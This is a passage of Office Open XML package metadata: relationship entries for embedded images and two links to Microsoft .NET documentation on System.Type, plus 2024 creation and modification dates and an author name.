Target="/media/image9.png" Id="Re2daab58fbfe4f65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="R25988755db134a6c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="R1ec59fe07d3d4045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.png" Id="R46cd8f0916e945db" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imaged.png" Id="Rc02f01815db3472c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagee.png" Id="Rc8783008b94049fb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/dotnet/api/system.type?view=net-7.0" TargetMode="External" Id="Ree97fdbd76234048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/dotnet/api/system.type.assemblyqualifiedname?view=net-7.0" TargetMode="External" Id="R243f68088ea94e15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagef.png" Id="R56db5819a6434fb7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image10.png" Id="Rfc8c023b48314848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image11.png" Id="R6625d831d88449e6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image12.png" Id="Rb91ea20869ee4e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2024-04-11T09:40:21.2318800Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-11T09:41:07.6463133Z</dcterms:modified>
  <dc:creator>Aleksandar Milosavljevic</dc:creator>
  <lastModifiedBy>Aleksandar Milosavljevic</lastModifiedBy>
</coreProperties>
</file>